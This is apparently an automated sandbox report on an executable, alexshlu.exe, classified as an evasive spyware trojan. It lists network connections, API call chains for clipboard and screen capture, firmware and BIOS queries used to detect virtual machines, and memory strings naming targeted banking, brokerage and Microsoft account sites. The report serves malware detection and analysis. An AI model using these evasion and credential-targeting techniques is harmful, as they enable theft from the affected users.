                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00431A30
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00431A30
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431BB0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A7AF00_2_002A7AF0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A1B700_2_002A1B70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A10000_2_002A1000
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002B21010_2_002B2101
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002B89000_2_002B8900
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C63620_2_002C6362
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A4C000_2_002A4C00
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002AD4DB0_2_002AD4DB
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002B35000_2_002B3500
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A6D700_2_002A6D70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C458A0_2_002C458A
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A3E600_2_002A3E60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A10003_2_002A1000
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002B21013_2_002B2101
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002B89003_2_002B8900
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A7AF03_2_002A7AF0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C63623_2_002C6362
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A1B703_2_002A1B70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A4C003_2_002A4C00
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002AD4DB3_2_002AD4DB
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002B35003_2_002B3500
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A6D703_2_002A6D70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C458A3_2_002C458A
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A3E603_2_002A3E60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0040A9603_2_0040A960
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004261703_2_00426170
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0040E2A93_2_0040E2A9
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00416B7E3_2_00416B7E
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00439B903_2_00439B90
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004233A03_2_004233A0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00436C403_2_00436C40
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043DCF03_2_0043DCF0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004215F03_2_004215F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042C6D73_2_0042C6D7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043E6903_2_0043E690
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042BFD33_2_0042BFD3
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00410FD63_2_00410FD6
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042BFDA3_2_0042BFDA
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004087F03_2_004087F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00436F903_2_00436F90
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004097B03_2_004097B0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00425F7D3_2_00425F7D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004090703_2_00409070
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043A0303_2_0043A030
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004038C03_2_004038C0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004380D93_2_004380D9
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041D8E03_2_0041D8E0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042D0853_2_0042D085
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004280B03_2_004280B0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042297F3_2_0042297F
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042A1003_2_0042A100
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004379003_2_00437900
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00416E973_2_00416E97
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004059103_2_00405910
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004259203_2_00425920
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004301D03_2_004301D0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004081F03_2_004081F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004089903_2_00408990
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004171903_2_00417190
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00414A403_2_00414A40
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041BA483_2_0041BA48
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0040CA543_2_0040CA54
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004042703_2_00404270
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004222703_2_00422270
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004062003_2_00406200
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00423A003_2_00423A00
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CAC03_2_0043CAC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043E2C03_2_0043E2C0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004292D03_2_004292D0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00415ADC3_2_00415ADC
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042BA8D3_2_0042BA8D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004192BA3_2_004192BA
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0040B3513_2_0040B351
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041CB5A3_2_0041CB5A
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004093603_2_00409360
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041C3603_2_0041C360
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00411B1B3_2_00411B1B
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043533A3_2_0043533A
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CBD63_2_0043CBD6
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043A3F03_2_0043A3F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00404BA03_2_00404BA0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0040D44C3_2_0040D44C
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00434C4D3_2_00434C4D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004074703_2_00407470
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00419C103_2_00419C10
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00418C1E3_2_00418C1E
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041D4203_2_0041D420
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041DC203_2_0041DC20
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004364303_2_00436430
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CAC03_2_0043CAC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CAC03_2_0043CAC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CCE03_2_0043CCE0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00422CF83_2_00422CF8
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00427C9D3_2_00427C9D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CD603_2_0043CD60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004165713_2_00416571
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00424D703_2_00424D70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00423D303_2_00423D30
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041DE403_2_0041DE40
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00423E4B3_2_00423E4B
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00405E603_2_00405E60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004126703_2_00412670
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004256703_2_00425670
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041AE003_2_0041AE00
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CE003_2_0043CE00
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00423E303_2_00423E30
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004156D03_2_004156D0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00415EE03_2_00415EE0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004266E73_2_004266E7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004066903_2_00406690
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004366903_2_00436690
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00416E973_2_00416E97
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00402EA03_2_00402EA0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004376B03_2_004376B0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00426EBE3_2_00426EBE
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00428F5D3_2_00428F5D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0042B7633_2_0042B763
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00425F7D3_2_00425F7D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00414F083_2_00414F08
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004207173_2_00420717
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004187313_2_00418731
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0041EF303_2_0041EF30
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_004167A53_2_004167A5
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00418FAD3_2_00418FAD
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043DFB03_2_0043DFB0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: String function: 00414A30 appears 76 times
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: String function: 002B6C0B appears 42 times
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: String function: 00408000 appears 52 times
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: String function: 002BB97D appears 40 times
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: String function: 002AD9E0 appears 102 times
                Source: alexshlu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: alexshlu.exeStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                Source: alexshlu.exeStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@11/2
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00436F90
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
                Source: alexshlu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\alexshlu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: alexshlu.exe, 00000003.00000003.1530567050.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1565708223.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1565708223.0000000003590000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529856138.0000000003516000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: alexshlu.exeReversingLabs: Detection: 73%
                Source: alexshlu.exeVirustotal: Detection: 75%
                Source: C:\Users\user\Desktop\alexshlu.exeFile read: C:\Users\user\Desktop\alexshlu.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"
                Source: C:\Users\user\Desktop\alexshlu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\alexshlu.exeProcess created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"
                Source: C:\Users\user\Desktop\alexshlu.exeProcess created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"Jump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: alexshlu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: alexshlu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: alexshlu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: alexshlu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: alexshlu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: alexshlu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002ADB9A push ecx; ret 0_2_002ADBAD
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002ADB9A push ecx; ret 3_2_002ADBAD
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00446061 push edx; retf 3_2_00446062
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh3_2_0043CA63
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00445A2E push esi; ret 3_2_00445A31
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00442543 push esp; retf 3_2_00442549
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00446EA4 push edi; iretd 3_2_00446EA5
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00439F70 push eax; mov dword ptr [esp], 60616263h3_2_00439F7F
                Source: C:\Users\user\Desktop\alexshlu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\alexshlu.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exe TID: 7736Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exe TID: 7736Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C0868 FindFirstFileExW,0_2_002C0868
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C0919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002C0919
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C0868 FindFirstFileExW,3_2_002C0868
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C0919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_002C0919
                Source: alexshlu.exe, 00000003.00000003.1565346772.0000000003593000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754749506.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: alexshlu.exe, 00000003.00000002.1775468218.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
